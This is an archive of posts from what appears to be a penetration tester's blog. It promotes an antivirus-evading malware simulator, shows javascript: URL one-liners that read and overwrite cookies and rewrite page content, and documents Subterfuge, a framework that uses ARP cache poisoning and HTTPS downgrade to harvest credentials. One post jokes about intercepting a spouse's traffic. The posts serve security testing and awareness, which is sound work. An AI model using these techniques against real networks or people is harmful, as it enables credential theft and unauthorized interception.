Category Archives: Computer Security

Accelerate your Attack with Artemis

It is widely acknowledged that antivirus is not an effective security mechanism against 0-day threats. It is not until malware has been out in the wild propagating for a while that it catches a vendor’s eye and a signature for it is developed. Once that happens it is trivial for a malicious actor to modify his source code while preserving the functionality of his tool, and then the process starts all over again. Unfortunately, for the penetration tester this means that each one of us must have our own individual solution to the antivirus problem in order to give our clients the value they deserve out of an information security assessment. After all, if the bad guys are doing it, it MUST also be a part of our security evaluation procedures. Penetration testers should not have to spend their time bypassing a security mechanism that other less ethical hackers would simply vaporize. We built Artemis to solve this deficiency.

cevincereArtemis is an advanced malware simulation suite capable of emulating the Advanced Persistent Threat. Artemis raises the bar allowing ethical hackers and penetration testers the luxury of an advanced set of features equivalent to many of the tools employed by criminal gangs today. By abstracting polymorphism to a server based platform at cevincere.com Artemis is able to stay one step ahead of antivirus vendors, and ensure that penetration testers can give their clients the value that they deserve.

How Artemis Bypasses Antivirus

Cevincere uses several techniques to generate a unique binary in order to bypass antivirus. Because Artemis’ signature is vastly altered each time it is created AV is unable to create an effective signature.

Features

  • Evades signature-based anti-virus detection
  • Integrates with free tools like the Metasploit Framework & Armitage
  • Robust communication channel maximizes connectivity
  • Increases stealth by dialing back on a customizable interval

I hope that Artemis is able to help you push your penetration tests to the next level! The video below is a short demonstration of how Artemis may be able to assist you. Happy Hacking!

NetWars — Tournament of Champions

Last week I competed in the NetWars Tournament of Champions competition put on by SANS at their annual Cyber Defense Initiative in Washington, D.C. It was a great opportunity to flex one’s cyber muscle. Here is a link to their press release on the event.

NetwarsThe competitive atmosphere was palpable and as the tournament began ramping up you could very nearly taste the excitement in the air. It was obvious when the scoring servers opened, because one hundred or so giddy hackers were instantaneously shrouded in a mantle of silence. Game time! I battled my way through progressively challenging obstacles to the beat of some of the most… interesting… music I’ve ever heard in my life, but at the end of day one I was actually only in 9th place overall. Walking back into the room on day two instantly transported you back into the zone, and if our monotone responses to Ed Skoudis’ enthusiastic questions were anything to judge by; we were raring to go. When they finally released the hounds, it was as if we had immediately run into a brick wall. The new NetWars is much more difficult than its predecessor. I’d have to say that that is what helped me; when things got hard I started to shine.

Exposure, if there were a word for what I took away from NetWars that would be it. While trolling the Internet for tricks and practicing them against your own network is great, I really think that the best way to develop the critical thinking skills necessary to be a real threat, is to be confronted with something new. The bad guys have it easy. There is an overabundance of new yet juicy targets for them to interdict, readily available on the web. For the ethical hackers among us acquiring this experience is much more difficult, and we need it if we are to keep the wolves at bay. NetWars Tournament of Champions was an all-new sequence of challenges that forced you to evaluate the problem, hypothesize potential solutions, and finally break in. There are few ways to improve your tradecraft that can compare.

On to the spoils! Everyone invited to the Tournament of Champions received exceedingly nifty, yet awkward to wear, sound activated, flashing shirts. Unintended bonus, you can swap in the batteries from your shirt if your Bluetooth keyboard runs out of juice, nice!

Grand prize at NetWars Tournament of Champions – The Golden Ticket:

goldenticket2You have won FIRST PLACE in the second annual SANS NetWars Tournament of Champions, an achievement of outstanding, astonishing proportions. Through in-depth knowledge, cutting-edge skills, and deep cunning, you secured victory!

As the ultimate winner, winner you will enjoy a trip to spend an amazingly geektastic day at NetWars Research World Headquarters. You’ll observe first-hand the NetWars super-secret lair and command center. Your exclusive travel voucher is valid for up to $500 in flight costs, plus one night of hotel accommodations, and entitles you to spend a full day with Ed Skoudis and his team, seeing how they design, build, and operate SANS NetWars challenges.

It gets even better. You’ll tour the steam punk office, a perfect blend of 1880’s design and cutting-edge technology, infused with a collection of historical crypto systems and curious gadgets. Your adventure will include the Secret Room, the Secret-Secret Room, and experiments with a genuine World War Two Enigma machine. You’ll also feast with Ed and the team at a nearby restaurant, geeking out with in-depth discussions of all things infosec.

But, wait, there’s more! Best of all, during your special day, you’ll get to experience the new SANS NetWars CyberCity. This miniaturized town, chock full of NetWars missions, is our most ambitious challenge ever, designed to teach cyber warriors how cyber action can have kinetic effect against real-world systems. As the ultimate NetWars champion, you’ll get serious bragging rights as you complete several CyberCity missions!

Hereby duly signed, with hearty congratulations, by:

Ed Skoudis, Yori Kvitchko

I also received a plaque commemorating my victory:

championplaque2

Finally, the scoreboard at the end of the competition!

NetWarsScoreboard

Pentesting WebApps with Javascript URL Injection

Synopsis

Ever have to run a pentest sans tools? Breaking a WebApp can be a fairly tedious experience when your intercepting proxy has flown the coup. Believe it or not many of the functions you may be used to accomplishing through ZAP or Burpsuite can also be done in the URL bar of your browser! URL Injection is a great way to do anything from modifying your browser cookies to changing form data, to modifying arbitrary code on the web page.

Injection Basics

For starters lets take a look at how its done:

Basic URL Injection

 

 

 

The javascript alert function is the progenitor of those annoying popups that pervaded the internet in the nineties, and still exist on the sites of those web developers who haven’t pulled their heads out of a hole in over a decade. For our purposes the alert function is extremely handy. We can use it to quickly interrogate our browsers. The above command, for instance, will display current cookie values for our perusal. Your browser can be interrogated in the same way for just about any of the information that an intercepting proxy yields.

Some web developers handle authentication and session information with cookies. With the above URL Injection revealing this is trivial, and it’s normally one of the first things I do to any WebApp I’m pentesting. Getting information is all well and good, but how can we put this technique to more nefarious purposes?

Cookie Fraud

Javascript URL Injection is my preferred method of modifying web session cookies because it’s quick, easy, and because 60% of the time it works every time. This is most eloquently done with the void() function, though that can be left off.

More Eloquent:
javascript:void(document.cookie="MyCookie=MyValue")

Less Eloquent:
javascript:document.cookie="UserID=42"

The less eloquent method will direct you browser to a blank page (where it will execute your injection). Using that method you have to browse back to the original site for your edits to take the appropriate effect. It can; however, be easier to remember.

Modifying Form Data

One of the most useful aspects of an Intercepting Proxy is its ability to modify form data on the fly. In a pentest we can use this to fuzz the inputs of websites searching for anything from XSS flaws to SQL Injection vulnerabilities. This can also be done with URL Injection. Check it out:

javascript:void(document.forms[0].to.value="");

Editing Arbitrary Web Data

And finally for those moments when you have to edit some random html element on a page. There is the innerHTML function. Check out Google’s new facelift!

GoogleFaceLift

javascript:void(document.getElementById('lga').innerHTML="<img src='http://kinozoa.com/images/0sm0s1z.png' style='padding-top:112px'>")

Basically, we can specify an element on the webpage (in this case “lga”). Then using innerHTML we can edit the code in real time, replacing it with more useful stuff.

This function is also pretty nifty when you’ve MITM’d your spouse with Subterfuge and want to do some seamless edits… Because, You Know… Hacker…

 

Combine Subterfuge with Armitage Adversaries Beware!



Subterfuge and Armitage make a Terrific Duo!

Okay… So you can harvest creds like a boss… What else can you do with Subterfuge? In this video we combine Subterfuge and Rafael Mudge’s Armitage to unleash the full power of Metasploit on our foes!

This video is a good example of how we like to use Subterfuge, but whether it’s Armitage, msfconsole, or a homegrown exploit Subterfuge can send victims your way. In today’s much more security conscious age you are far more likely to turn a client side exploit into a successful pentest then the remote code execution vulnerabilities that pervaded the past decade.

On Armitage

Armitage gets a lot of flack from some MSF power users, but personally I find its integration with Metasploit’s RPC to be the most convient way to interact with the msfconsole. Mudge has put a ton of work into Armitage over the past couple of years. The result is a sleek, capable tool that just gets the job done. Thanks Rafi!

 

Armitage

 

Checkout his site: Strategic Cyber

Attack Breakdown

Difficulty – Intermediate

Attack Methods – ARP Cache Poisoning, HTTPS Downgrade, Java Signed Applet (Browser Exploit)

Subterfuge Documentation


Subterfuge5Wallpaper

Enter Subterfuge, a Framework to take the arcane art of Man-in-the-Middle Attacks and make it as simple as point and shoot. Subterfuge demonstrates vulnerabilities in the ARP Protocol by harvesting credentials that go across the network and even exploiting machines by injecting malicious code directly into their browsing sessions.

How to use this Document

Reading through this entire document may be tedious, and will certainly deluge you in information you may not have any desire in knowing. To aid in your perusal below is a short summary of each section, so that you know where to go in order to get the information that you came for:

Introduction

This section is for those of you who are interested in where the Subterfuge Project came from, why it exists, and what we hope to accomplish. The introduction focuses on the risks of MITM attacks, the programmatic structure of Subterfuge, and the community buoying it up.

                     The Attack

                     The next portion of the documentation gets right into running Subterfuge.  It starts with the most basic usage, and moves on to basic module usage as well as settings and configuration options. 

                     Modules

                     Extending the attack through Plugins and Modules. This section takes an in depth look at how Subterfuge can really work for you. 

                     Troubleshooting

                     The most pervasive problem with hacking tools is that they never quite work right for everyone. Between the plethora of different builds we operate, and the differing conditions of each attack breaking things is almost inevitable. Here’s what to do to fix it.

                     Third-Party Tool Integration

                     Subterfuge doesn’t exist in a vacuum, and we didn’t design it that way. Here we discuss the external tools that the project leverages, and how they interact with the framework to make the penetration testing experience more fluid and dynamic.

                     Extending Subterfuge

                     Making Subterfuge work for you is easy. This portion of the documentation talks about just how to get deeper functionality out of the system. 

                     Contributing to the Project

                     Community Support for the project has been great so far. If you would like to contribute in some manner then this section might merit your perusal. 

                     Appendices

                     Other stuff. See for yourself.

Installing Subterfuge on Kali Linux



Walkthrough

This is an install of Subterfuge Version 1.0. It takes place on a Virtual Box VM running Kali Linux 1.0.2. Packages were updated by running:

apt-get update
apt-get dist-upgrade

Step 1: Download the Code

Downloads

Step 2: Install Subterfuge

dpkg -i subterfuge_1.0-1_all.deb

Step 3: If the installer errors due to dependency issues install them along with Subterfuge

apt-get update && apt-get -f install

Because Subterfuge has deprecated its old installer and switched over to the Debian packaging system there should no longer be any chance that installing Subterfuge will break your existing packages!

Hopefully this install worked out for you all. Post in the comments if your issues still seem to persist, and we’ll try to help you work it out.

On Blogging

Thus far I’ve only ever blogged about Subterfuge extensively. While I have been focusing on Subterfuge development over the past year, it hasn’t been my only pursuit. I figured I’d open things up a bit and start adding additional content to the site. Things to expect to see here:

  • Subterfuge Stuff (of course)
  • General Security Topics
  • Red Team Tactics
  • Other Projects I’m Working On
  • Encounters of a Third Kind (interesting security related things I run into on the net)

To start things off I figured I’d post my writeup for the 2012 SANS Holiday Hack. The writeup is a bit belated, but it was a fun little competition. Link

Subterfuge — The Attack

Note that on BackTrack scripts MUST be enabled in order for Subterfuge to run.

“He who is prudent and lies in wait for an enemy, who is not, will be victorious.” –-Sun Tzu

Right so on to the part everyone actually cares about… Running Subterfuge! This part of the documentation focuses on getting the framework up, running, and working for you. Let’s get started. Installation Procedures

Gaining a MITM Position

Now that we’ve got the framework install let’s attack. The first step in any Subterfuge attack is gaining a Man-in-the-Middle position. Currently, Subterfuge only ships with one method of establishing itself as MITM, ARP Cache Poisoning. Nevertheless, as a framework, its modular design allows it to support multiple methods.

Running Subterfuge:
To start Subterfuge, click the Start button in the top right corner. A popup window should present asking you if you would like Subterfuge to automatically configure the attack select OK. Now the attack should be running as seen above. Note that on BackTrack scripts MUST be enabled in order for Subterfuge to run.

ARP Cache Poisoning

What did we just do? If you already know or don’t really care move on to the next section, for those of you do care let’s take a moment to talk about the anatomy of the attack. I won’t get into the behind the scenes actions that Subterfuge takes in order to make this process so easy if you are interested in that information head over to Extending Subterfuge and the Appendices.

Let’s back up a moment and talk about the Address Resolution Protocol (ARP). ARP is about as simple as a protocol gets. Its purpose is to associate MAC (Hardware) addresses with IP addresses. This allows devices on the Local Area Network (LAN) to find each other. Excluding Reverse ARP, there are really only two kinds of things that an ARP can say:

  1. ARP Request             –  “Who has X IP Address”
  2. ARP Reply                 –  “X IP is at X MAC Address”

What happens if instead of giving the standard ARP Reply we say, “X IP is at Y MAC Address”? Everyone who hears the packet adheres to it. This really uncovers the fundamental problem with the protocol. There isn’t a shred of authentication. Below is a Wireshark capture of an awry ARP packet.

Untitled2

Because this packet was sent to the broadcast all of the machines on the LAN will see the packet and adjust their ARP Tables to match. This means that all traffic bound for 192.168.1.1 (the router’s IP address) will go instead to the box bearing the attacker’s MAC address. We’ve achieved Man-in-the-Middle.

Untitled3

A victim running Windows 7 displays their ARP Table

Dynamic Poison Retention & ARPBLock

One problem with a traditional ARP Cache Poison attack is that the router and victims will occasionally send out legitimate ARP requests and replies. This means that the attacker will experience a period of MITM loss immediately after this traffic. In order to minimize this, a typical attack will simply spam ARP across the network. Subterfuge uses ARPtables to attempt to block all ARP that it does not personally distribute. Furthermore, Subterfuge uses what we’ve taken to calling Dynamic Poison Retention in order to preempt legitimate ARP. This allows us to run a much more stable attack, and even increase stealth by relying on something other than a ticker to retain a poison.

Dynamic Poison Retention in action

Dynamic Poison Retention in action

Using Subterfuge Modules

So now you’ve got MITM, but what on God’s green earth do you do with it? Let’s cursorily check out Subterfuge’s Modules.

The Subterfuge Module View

The Subterfuge Module View

Subterfuge ships with many modules. After acquiring a man in the middle position we have a strongpoint from which to pillage the network. Subterfuge makes leveraging this position as simple as a few clicks. Check out the modules section for more on this.

Settings and Configuration Options

One of the most unique aspects of Subterfuge in the realm of network attack tools is the ease with you can customize virtually anything about your attack. The settings page makes configuring and optimizing an attack simple.

Configuring Subterfuge is Simple

Configuring Subterfuge is Simple

Attacking from the Network View

Through the Network View Subterfuge opens up a whole new way to visualize, and interact with a MITM position. Every box that shows up in this view represents an actively poisoned victim. Subterfuge synchronizes individual portions of the page with the server to make the attack look and feel real-time. The Network View also makes it easy to control the spectrum of your attack, and interact with modules directly, all from one place.

Subterfuge’s Network View Demonstrates an all New Way to interact with a MITM Position

Subterfuge’s Network View Demonstrates an all New Way to interact with a MITM Position

That’s all there is to starting up a basic MITM attack with Subterfuge. The next chapter focuses more on how to leverage your attack position with the frameworks modules.

Documentation Introduction

Subterfuge5Wallpaper

Subterfuge5Wallpaper

Enter Subterfuge, a Framework to take the arcane art of Man-in-the-Middle Attacks and make it as simple as point and shoot. Subterfuge demonstrates vulnerabilities in the ARP Protocol by harvesting credentials that go across the network and even exploiting machines by injecting malicious code directly into their browsing sessions.

How to use this Document

Reading through this entire document may be tedious, and will certainly deluge you in information you may not have any desire in knowing. To aid in your perusal below is a short summary of each section, so that you know where to go in order to get the information that you came for:

Introduction

This section is for those of you who are interested in where the Subterfuge Project came from, why it exists, and what we hope to accomplish. The introduction focuses on the risks of MITM attacks, the programmatic structure of Subterfuge, and the community buoying it up.

                     The Attack

                     The next portion of the documentation gets right into running Subterfuge.  It starts with the most basic usage, and moves on to basic module usage as well as settings and configuration options.

                     Modules

                     Extending the attack through Plugins and Modules. This section takes an in depth look at how Subterfuge can really work for you. 

                     Troubleshooting

                     The most pervasive problem with hacking tools is that they never quite work right for everyone. Between the plethora of different builds we operate, and the differing conditions of each attack breaking things is almost inevitable. Here’s what to do to fix it.

                     Third-Party Tool Integration

                     Subterfuge doesn’t exist in a vacuum, and we didn’t design it that way. Here we discuss the external tools that the project leverages, and how they interact with the framework to make the penetration testing experience more fluid and dynamic.

                     Extending Subterfuge

                     Making Subterfuge work for you is easy. This portion of the documentation talks about just how to get deeper functionality out of the system.

                     Contributing to the Project

                     Community Support for the project has been great so far. If you would like to contribute in some manner then this section might merit your perusal.

                     Appendices

                     Other stuff. See for yourself.

About Subterfuge

A rapidly expanding portion of today’s Internet strives to increase personal efficiency by turning tedious or complex processes into a framework, which provides instantaneous results.  On the contrary, much of the information security community still finds itself performing manual, complicated tasks to administer and protect their computer networks. Subterfuge is a simple but devastatingly effective Man-in-the-Middle (MITM) Attack Framework, which exploits vulnerabilities in the inherently trusting Address Resolution Protocol.  It does this in such a way that even a non-technical user would have the ability, at the push of a button, to attack all machines connected to the local area network (LAN). Subterfuge further provides the framework by which users can then leverage a MITM attack to do anything from browser/service exploitation to credential harvesting, thus equipping information and network security professionals and enthusiasts alike with a sleek “push-button” security validation tool.

User-friendly network attack tools are quick to make national headlines due to the threat they pose and because, “in truth, the tools and techniques employed by hackers are extremely complex[1].”  Firesheep, a Firefox web browser plugin, is just such a tool.  It was designed to capture cookies created during the login process for secure web sites, and it does this at the push of a button.  Firesheep’s push-button simplicity and overwhelming effectiveness led to its ubiquitous use by skilled professionals and non-skilled users alike, thus focusing attention on a fixable yet often-ignored error in web site implementation. What makes tools with this level of simplicity interesting is that, while any skilled hacker should be able to script something equivalent with little effort, he no longer has to, and can now focus on more delicate attacks.

The Subterfuge Project attempts to use the paradigm popularized by Firesheep, Armitage, and other user-friendly network attack tools to create a framework for Man-In-The-Middle (MITM) attacks.  A MITM attack uses eavesdropping to insert a malicious entity into the communication path between legitimate users on a network[2].  This entity can then masquerade as either of the legitimate users in order to capture sensitive information, like login credentials for a protected web site.  Typically, a MITM attack requires a significant amount of complex, text-based configuration of numerous software programs.  This complexity, combined with the virtually never-ending reports of stolen identities and online credential theft, makes the MITM attack a prime candidate for the creation of a user-friendly, simplified framework.

We designed the framework to have a simple interface with minimal configuration requirements in order to appeal to skilled and non-skilled network security professionals and users alike.  Subterfuge has a sleek web based interface to allow a user to deploy the software quickly and easily without editing sophisticated text-based configuration files.  Subterfuge automates the configuration process or, alternately, streamlines it with a Graphical User Interface (GUI). It also allows the user to view a report of all the different credentials that were harvested. The ease with which the general populace would be able to use Subterfuge will demonstrate to information security professionals the dangers of MITM attacks on a large scale.

Subterfuge is developed with the Python programming language and uses a SQLite database. JavaScript handles significant frontend logic.

Man-in-the-Middle Threat Analysis

So what is the big deal? Well a study from Cornell University’s Center for Hospitality Research stated that over 90% of hotels provide wireless Internet access to their customers, and the vast majority of these access points are susceptible to ARP Poisoning Attacks[3].

There are two significant types of MITM attacks: Passive and Active.  In a Passive attack, a hacker can observe what his victim is viewing, which allows the attacker to steal credentials and session cookies.  In an Active attack, “the target is entirely controlled by the attacker, rather than being limited by the extent of the victim’s browsing activity[4]”.

Several major websites, such as Google and Facebook, have recently realized a significant blunder on their part in terms of browsing security for their users.  Facebook used to encrypt solely the login traffic, which contained the username and password of the individual.  Afterwards, the session returned to a regular, plain text browsing session, which could be intercepted and easily read by anyone who might be performing a MITM attack.  In a paper on the security issues, which are challenging Facebook, the need to “educate Facebook users about using secure socket layer (SSL) applications” is discussed as a prerequisite to protecting their users from identity theft[5].

In addition to web site design and implementation errors, the network Address Resolution Protocol (ARP) itself has residual vulnerabilities that are commonly exploited during a MITM attack.  The extent to which computers on a local network rely on, and inherently trust the responses of, ARP messages is alarming.  If ARP message processing remains uncontrolled, ARP sniffing and poisoning can occur, which means that an attacker can begin the process of masquerading as a legitimate user[6].  Current steps that the security community has made to secure ARP are woefully inadequate.  Heightened awareness of the threat implicated by MITM attacks should become more commonplace amongst both computer users and security professionals.

Man-in-the-Middle Attacks are a category of vulnerability against which most applicable systems are susceptible. They are and will remain this way because of their obscurity. Until MITM attacks are simplistic enough that even aspiring security professionals can easily leverage them against networks, manufacturers will continue to develop and distribute vulnerable equipment. With Subterfuge, it is possible to make knowledge of these vulnerabilities mainstream, beyond even the security community. Subterfuge can be the motivation that manufactures like Cisco need to build the protections that they have provided to their enterprise customers for years into the systems they sell the average consumer.

The overall goal was to develop a tool that is sufficiently effective and easy to use in order to encourage the security community to focus on the massive vulnerability inherent in the Address Resolution Protocol.  To achieve this result, we created a framework called Subterfuge, which allows even an average user to exploit the vulnerabilities in ARP on a local network.

The most basic implementation of Subterfuge collects information and user authentication credentials across an entire local area network and organizes the collected data into a SQLite Database.  It does this by automating an ARP Cache Poisoning Attack while leveraging SSLStrip, which is publicly available.

Subterfuge automatically manages its configuration, yet allows more advanced users the ability to delve deeper into the MITM settings.  This requires Subterfuge to detect the hardware and network configurations needed to initiate the attack.  Additionally, Subterfuge is able to properly configure, setup, and deploy SSLStrip with little or no input required from the user. The tedious and difficult problem of properly configuring and executing these multiple pieces of software in unison is eased by the automation developed and included in the Subterfuge Project.

This tool is deemed successful if a user is able to execute Subterfuge to collect user information and credentials on the network to which they are connected.  Specifically, a Subterfuge user ought to be able to steal user credentials, without the victim’s knowledge, even when a “secure” protocol such as HTTPS is perceived.

About the Creators

Subterfuge was created by Christopher Shields (r00t0v3rr1d3) & Matthew Toussain (0sm0s1z).

Program Composition

In the field of Man-in-the-Middle tools Subterfuge has a unique structure, which opens the door to a wide array of additional features and options.

Server/Client Architecture

Subterfuge uses server/client architecture. When you run Subterfuge you are actually starting up a server that is then accessed by the client, a web browser. This is important because it is the fundamental basis for collaboration within the system. Multiple devices can access a Subterfuge server simultaneously; because statuses are monitored real time interaction between penetration testing parties is possible.

Furthermore, this architecture gives us the ability to turn Subterfuge into a payload to MITM a remote network. (In development for a future release)

Web Frontend

The web frontend comprises the Graphical User Interface that you interact with. Because HTTP is a stateless protocol significant JavaScript logic was implemented in order to give the framework a live look and feel.

Database

Subterfuge uses a SQLite Database. We chose SQLite 3 because it is exceedingly lightweight and easy to port. It meant that the framework could ship with a preconfigured database of its own rather then have to configure it as part of the installation process. The database includes sections for modules, settings, and third-party programs. (See Extending Subterfuge for more information)

OS Compatibility

As of Version 4.1 Subterfuge is compatible with the Linux Operating System only. Future cross-platform compatibility is in the works. The next step will involve releasing an OSX version, followed by Windows XP & Windows 7. The OSX version should be BSD compatible.

Currently, significant issues exist when attempting to port Subterfuge into the Windows environment. As such this step in the port may not occur for some time.

The Framework

Naturally, Man-in-the-Middle Attacks are not limited to mere credential fraud. Neither is Subterfuge. Basic usage of the tool will be to ARP Poison the LAN; however, from this perspective it is possible to initiate many attacks. The Framework will automatically gather credentials, but it can also do more. Subterfuge’s Plugin System allows for the usage of additional MITM functionality without the need to develop another security tool from scratch.

Community Support

When development of the Subterfuge Project began we created a Google Code site in order to help us with project management and collaboration. What we did not expect was for the community to stumble upon it, and begin hyping it. What we certainly did not anticipate was those of you out there who actually contributed code to the project to help us alleviate bugs.

Then someone must have told Backbox Linux about our tool, because they approached us to get Subterfuge added into their repositories. Finally, after our beta release at DEFCON BackTrack Linux adopted the tool, and it was included in version 5 release 3.

So far the community has been very accepting of our errors and pages upon pages of bug notes. We intend to keep extending the framework and building new features into it so thank you in advanced for bearing with us through several more reams of release notes jam-packed with bugs and fixes.

From the moment the community found it you all have been tweeting, writing articles, giving suggestions, and even contributing code to the project. Thanks for the support!

 


[1] Barber, R. (2011, August 30). Security Science. Retrieved from Computer Fraud & Security Volume 2001, Issue 3.

[2] Kurose, J. and Ross, K. Computer Networking: A Top-Down Approach. 5th Edition. Addison-Wesley. Page 61

[3] Ogle, J. and Wagner, E. (2012, March 8). Hotel Network Security: A Study of Computer Networks in U.S. Hotels. Retrieved from http://www.hotelschool.cornell.edu/research/chr/pubs/reports/abstract-14928.html

[4] Saltzman, R. (2011, August 30). Security Science. Retrieved from OWASP: http://www.security-science.com/pdf/active-man-in-the-middle.pdf

[5] Leitch, S. (2009). Security Issues Challenging Facebook. Retrieved from Edith Cowan University Research Online: http://ro.ecu.edu.au/cgi/viewcontent.cgi?article=1017&context=ism&sei-redir=1#search=%22facebook%20secure%22

[6] Wagner, R. (2011, August 30). Address Resolution Protocol Spoofing and Man-in-the-Middle Attacks. Retrieved from http://savannah.gatech.edu/people/lthames/dataStore/WormDocs/arppoison.pdf